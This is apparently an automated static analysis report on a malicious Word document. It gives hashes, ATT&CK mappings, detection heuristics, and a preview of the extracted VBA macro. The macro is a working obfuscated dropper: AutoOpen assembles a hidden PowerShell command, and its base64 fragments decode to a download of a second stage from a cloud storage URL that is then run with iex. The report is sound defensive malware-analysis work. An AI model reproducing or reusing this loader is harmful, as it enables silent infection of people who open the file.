Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bba4915f332aa245…

MALICIOUS

Office (OLE)

Size: 268.5 KB
Created: 2018-03-07 21:55:00
Authoring application: Microsoft Office Word
First seen: 2019-12-10
MD5: 2b601c4d842bb3f43b9fe6c2143c6e0a
SHA-1: 47948014b8847f27f329c79eea5bcfd4af45703b
SHA-256: bba4915f332aa2453823fb1c50a715f9ffd9cb02bdbfdeb292226738f9119584
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened with macros enabled. The macro uses a Shell() call to execute a command, most likely to download and run a second-stage payload. The obfuscated script assembles the command string character by character from a lookup array and concatenates base64-encoded fragments, but the full URL or executable path could not be reconstructed because the extracted source is truncated.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6466406-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6466406-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The VBA code contains a Shell() call, which executes an external command
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro, which runs automatically when the document is opened
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6215 bytes
SHA-256: 08bdb37ec23c670408d2b410b19d589136fbde310ba2449ef7816fc5b96fb857

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "prodigy"
Sub AutoOpen()
    Dim DL_TC As String
    FL_PH = Array("c", " ", "w", "u", "e", "h", "b", "o", "-", "a", "d", "n", "p", "t", "y", "s", "r", "x", "i", "l")
    Dim EP_TH As String
    EP_TH = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
    DL_TC = DL_TC + FL_PH(12)
    DL_TC = DL_TC + FL_PH(7)
    Dim IS_NH As String
    IS_NH = "AHsAcgBlAHQAdQByAG4A"
    DL_TC = DL_TC + FL_PH(2)
    DL_TC = DL_TC + FL_PH(4)
    Dim JK_MD As String
    JK_MD = "IABbAFMAeQBzAHQA"
    DL_TC = DL_TC + FL_PH(16)
    DL_TC = DL_TC + FL_PH(15)
    Dim EQ_TI As String
    EQ_TI = "ZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
    DL_TC = DL_TC + FL_PH(5)
    DL_TC = DL_TC + FL_PH(4)
    Dim IP_KF As String
    IP_KF = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAa"
    IT_TJ = IT_TJ & EP_TH & IS_NH & JK_MD & EQ_TI & IP_KF
    DL_TC = DL_TC + FL_PH(19)
    DL_TC = DL_TC + FL_PH(19)
    Dim CQ_PH As String
    CQ_PH = "QBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIA"
    DL_TC = DL_TC + FL_PH(1)
    DL_TC = DL_TC + FL_PH(8)
    Dim FM_QD As String
    FM_QD = "dABdADoAOgB"
    DL_TC = DL_TC + FL_PH(2)
    DL_TC = DL_TC + FL_PH(18)
    Dim BS_NJ As String
    BS_NJ = "GAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAb"
    DL_TC = DL_TC + FL_PH(11)
    DL_TC = DL_TC + FL_PH(10)
    Dim FP_PA As String
    FP_PA = "gBnACgAJAB"
    DL_TC = DL_TC + FL_PH(7)
    DL_TC = DL_TC + FL_PH(2)
    Dim HS_KB As String
    HS_KB = "4ACkAKQB9ADsAaQBlAHgAIAAkACgAYQAgACQ"
    IT_TJ = IT_TJ & CQ_PH & FM_QD & BS_NJ & FP_PA & HS_KB
    DL_TC = DL_TC + FL_PH(15)
    DL_TC = DL_TC + FL_PH(13)
    Dim BQ_OI As String
    BQ_OI = "AKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBl"
    DL_TC = DL_TC + FL_PH(14)
    DL_TC = DL_TC + FL_PH(19)
    Dim CN_LI As String
    CN_LI = "AHEAdQBlAHMAdAA"
    DL_TC = DL_TC + FL_PH(4)
    DL_TC = DL_TC + FL_PH(1)
    Dim AS_OJ As String
    AS_OJ = "gACcAaAB0AHQAcABzADoALwAvAHUAc"
    DL_TC = DL_TC + FL_PH(5)
    DL_TC = DL_TC + FL_PH(18)
    Dim BL_RF As String
    BL_RF = "wBwAHIAZA"
    DL_TC = DL_TC + FL_PH(10)
    DL_TC = DL_TC + FL_PH(10)
    Dim HK_PC As String
    HK_PC = "A1ADEANQAwAGMAZQBuAHQAcgB"
    IT_TJ = IT_TJ & BQ_OI & CN_LI & AS_OJ & BL_RF & HK_PC
    DL_TC = DL_TC + FL_PH(4)
    DL_TC = DL_TC + FL_PH(11)
    Dim JP_TI As String
    JP_TI = "hAGwALgB0AGEAYgBsAGUALgBj"
    DL_TC = DL_TC + FL_PH(1)
    DL_TC = DL_TC + FL_PH(8)
    Dim BR_KI As String
    BR_KI = "AG8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8A"
    DL_TC = DL_TC + FL_PH(4)
    DL_TC = DL_TC + FL_PH(17)
    Dim GS_PI As String
    GS_PI = "dwBhAHIAZQBoAG8"
    DL_TC = DL_TC + FL_PH(4)
    DL_TC = DL_TC + FL_PH(0)
    Dim FO_QA As String
    FO_QA = "AdQBzAGUAPwAkAGYAaQBsAH"
    DL_TC = DL_TC + FL_PH(3)
    DL_TC = DL_TC + FL_PH(13)
    Dim IR_TA As String
    IR_TA = "QAZQByAD0AUABhAHIAdABpAHQAaQB"
    IT_TJ = IT_TJ & JP_TI & BR_KI & GS_PI & FO_QA & IR_TA
    DL_TC = DL_TC + FL_PH(18)
    DL_TC = DL_TC + FL_PH(7)
    Dim DT_MB As String
    DT_MB = "vAG4ASwBlAHkAJQAyADAAZQBxACUAMgAwA"
    DL_TC = DL_TC + FL_PH(11)
    DL_TC = DL_TC + FL_PH(12)
    Dim EK_PI As String
    EK_PI = "CUAMgA3AHMAdABhAGcAZQA"
    DL_TC = DL_TC + FL_PH(7)
    DL_TC = DL_TC + FL_PH(19)
    Dim AQ_OJ As String
    AQ_OJ = "lADIANwAm"
    DL_TC = DL_TC + FL_PH(18)
    DL_TC = DL_TC + FL_PH(0)
    Dim IO_NJ As String
    IO_NJ = "ACQAUwBlAGwAZQB"
    DL_TC = DL_TC + FL_PH(14)
    DL_TC = DL_TC + FL_PH(1)
    Dim FM_MB As String
    FM_MB = "jAHQAPQBkAGEAdABh"
    IT_TJ = IT_TJ & DT_MB & EK_PI & AQ_OJ & IO_NJ & FM_MB
    DL_TC = DL_TC + FL_PH(6)
    DL_TC = DL_TC + FL_PH(14)
    Dim DK_RJ As String
    DK_RJ = "ACYAcwB2AD0AMgAwADEANwAtADA"
    DL_TC = DL_TC + FL_PH(12)
    DL_TC = DL_TC + FL_
... (truncated)